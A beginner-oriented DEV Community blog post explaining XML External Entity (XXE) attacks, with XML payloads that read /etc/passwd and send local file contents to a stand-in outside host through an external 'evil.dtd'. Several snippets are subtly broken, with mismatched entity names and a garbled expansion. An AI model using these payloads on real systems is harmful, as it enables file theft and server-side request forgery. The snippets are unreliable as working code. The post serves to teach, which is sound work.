DEV Community

Cover image for XXE-XML External Entities Attacks
Ranjith Ashok
Ranjith Ashok

Posted on • Updated on

XXE-XML External Entities Attacks

XML External Entities (XXE) is a critical vulnerability that continues to pose a significant threat to web applications. By exploiting the power of XML, adversaries can manipulate entities, access system files, and even execute remote code. In this article, we delve into XXE, unraveling its intricacies through a beginner-friendly approach.

Let's start with the basics.

What is XML?

eXtensible Markup Language or XML. XML is a similar language to HTML, both of them are text-based languages and have a very simple syntax, but their main focus differs. HTML is more focused on data representation while XML is used for data transmission.

Basic XML template

<?xml version=”1.0”?>    #Metadata information

<Data> #Root Element
    <Subcategory1>Sample1</Subcategory1>
    <Subcategory2>Sample2</Subcategory2>
    <Subcategory3>Sample3</Subcategory3>
</Data>

Enter fullscreen mode Exit fullscreen mode

The above format might change slightly, but mostly there is not much difference. XML does not allow special characters, as this will cause confusion as to whether these characters belong to the actual information or the syntax while parsing the XML. This is where "Entities" come into the picture.

What are Entities?

You can think of "Entities" as a container or a variable that holds a certain value and can be used in different parts of the XML. These "Entities" are defined in a separate section in the XML file called Document Type Definition (DTD). These entities can not only store the values specified by the user, but they can also pull values from a local file and even pull data from the internet and store it for later use.

Given below is an example of XML using DTD

<?xml version=”1.0”?>    #Metadata information`

<!DOCTYPE Data [
    <!ENTITY sample "Sample1">
]>

<Data> #Root Element
    <Subcategory1>&sample;</Subcategory1>
    <Subcategory2>Sample2</Subcategory2>
    <Subcategory3>Sample3</Subcategory3>
</Data>

Enter fullscreen mode Exit fullscreen mode

The following is an example of entities being used to store data from external files.

<?xml version=”1.0”?>    #Metadata information`

<!DOCTYPE Data [
    <!ENTITY sample SYSTEM "/usr/share/secret.txt">
]>

<Data> #Root Element
    <Subcategory1>&sample;</Subcategory1>
</Data>
Enter fullscreen mode Exit fullscreen mode

In the above image, contents from secret.txt file are stored in "sample". "SYSTEM" is used to let the parser know that the data is fetched from an external source; it is the reference of the source.

Types of Entities:

  • General Entities: General Entities are simple entities that reference some value somewhere else, as in the above example.
  • Parameter Entities: These are entities that have another entity inside of them.

    <!ENTITY % outer"<!ENTITY inner 'Sample1'>">

    These are mainly used to exploit XXE.

  • Predefined Entities: These are a set of predefined values for special characters that might break the document if used directly.

    <hello>H<llo</hello> This is an illegal usage of "<"; this will break the code.

    <hello>&#x3C</hello> This is the valid usage where #x3C is the hex value of "<".

What is XXE?

In a website that accepts XML files, if we are able to write entities to access system files, then it is an XML External Entities (XXE) vulnerability. This vulnerability can be used to read contents from local files and even used for remote code execution.

Types of XXE:

  • In-band XXE: In an In-band XXE, the contents of the file or asset that we are trying to access are visible to us in clear text. It is a direct win.
  • Error-Based XXE: In Error-Based XXE, the contents are just a couple of messages. These error messages will provide some information to the attacker based on which the attacker proceeds.
  • Out-of-Band(OOB) XXE: This is a fully blind XXE where no kind of output is given.

More about DTDs and XXE-based attacks:

Previously we have discussed that Entities can store values defined by the user as well as contents from external files and URLs. But, Entities can also store the contents from another external DTD.

<!DOCTYPE Var SYSTEM "external.dtd">
Enter fullscreen mode Exit fullscreen mode

So what is the advantage of being able to use external DTDs when we can internally define the DTDs ourselves?

Using external DTDs allows us to use the parameters within a DTD during the declaration of an entity.

Let us better understand this using an example.

<?xml version=”1.0”?>

<!DOCTYPE Function [
    <!ENTITY % parameter_entity “<!ENTITY general_entity ‘XML Document’>”>
    %parameter_entity;
]>

<Function>&general_entity;</Function>
Enter fullscreen mode Exit fullscreen mode

The parameter entities are only allowed to be inside the DTD. The above code translates to the following.

<?xml version=”1.0”?>

<!DOCTYPE Function [
    <!ENTITY % parameter_entity “<!ENTITY general_entity ‘XML Document’>”>
    <!ENTITY general_entity ‘XML Document’>
]>

<Function>&general_entity;</Function>
Enter fullscreen mode Exit fullscreen mode

Now we can access the general entity.

<?xml version=”1.0”?>

<!DOCTYPE Function [
    <!ENTITY % file_content SYSTEM “/usr/share/Test.txt”>
    <!ENTITY %reference "<!ENTITY send SYSTEM 'https://randomsite.com/?%file;'>">
    %reference
]>

<Function>&general_entity;</Function>
Enter fullscreen mode Exit fullscreen mode

From the previous example, we can say that the above code translates to

<?xml version=”1.0”?>

<!DOCTYPE Function [
    <!ENTITY %reference "<!ENTITY send SYSTEM 'https://randomsite.com/?%file;'>">
    <!ENTITY send SYSTEM '<https://randomsite.com/?Contents> of file "Test.txt";'>
]>

<Function>&send;</Function>
Enter fullscreen mode Exit fullscreen mode

Now you might think that this is a very correct approach to getting the contents inside any file, but we will be thrown with an error when this file is parsed. This is because the %file parameter can only be referenced at the same level and cannot be referenced in some other entity declaration as in the code above.

So what is the bypass to that problem then? How do I reference a parameter entity in another entity then?

This is where external DTDs come into play. This same rule does not apply for external DTDs.

Look at the following example.

<?xml version=”1.0”?>

<!DOCTYPE data SYSTEM '<https://randomsite.com/evil.dtd>'>

<data>&send;</data>
Enter fullscreen mode Exit fullscreen mode

You might be wondering, where is the send entity? Let this be the contents of evil.dtd.

    <!ENTITY % file_content SYSTEM “/usr/share/Test.txt”>
    <!ENTITY %reference "<!ENTITY send SYSTEM 'https://randomsite.com/?%file;'>">
    <!ENTITY send SYSTEM '<https://randomsite.com/?Contents> of file "Test.txt";'>
Enter fullscreen mode Exit fullscreen mode

Here when evil.dtd, an external DTD, is referenced, the same operation that was expected before happens without any problems.

If you modify the entity file path to an external URL and are able to successfully connect to the external URL by uploading the file to a particular server, then you are practically making requests as the server, which is another vulnerability called the Server-Side Request Forgery (SSRF).

Exploiting XXE:

We have discussed that Entities and DTDs are the weaker links in XML that facilitate its exploitation.

Let’s see a basic XML payload.

<?xml version=”1.0”?>

<!DOCTYPE data [
    <!ENTITY xxe SYSTEM 'file:///etc/passwd'>
]>

<data>&xxe;</data>
Enter fullscreen mode Exit fullscreen mode

Here the contents of the file "passwd" are stored in xxe. Then it is referenced in .

I suggest you go through this amazing video by Pwnfunction in collaboration with John Hammond for a much deeper understanding of XXE.


You can also checkout

GitHub logo swisskyrepo / PayloadsAllTheThings

A list of useful payloads and bypass for Web Application Security and Pentest/CTF

Payloads All The Things

A list of useful payloads and bypasses for Web Application Security Feel free to improve with your payloads and techniques !
I ❤️ pull requests :)

You can also contribute with a 🍻 IRL, or using the sponsor button

Sponsor Tweet

An alternative display version is available at PayloadsAllTheThingsWeb.

📖 Documentation

Every section contains the following files, you can use the _template_vuln folder to create a new chapter:

  • README.md - vulnerability description and how to exploit it, including several payloads
  • Intruder - a set of files to give to Burp Intruder
  • Images - pictures for the README.md
  • Files - some files referenced in the README.md

You might also like the Methodology and Resources folder :

which has some really useful payloads for XXE.

In conclusion, XML External Entities (XXE) remain a significant threat to web applications, making it a top concern in the world of cybersecurity. I have only scratched the surface with this blog and would highly recommend getting hands-on to better understand the concepts discussed here.

Thank you for joining me on this journey. Will catch you in the next blog.

Happy Hacking!

Top comments (0)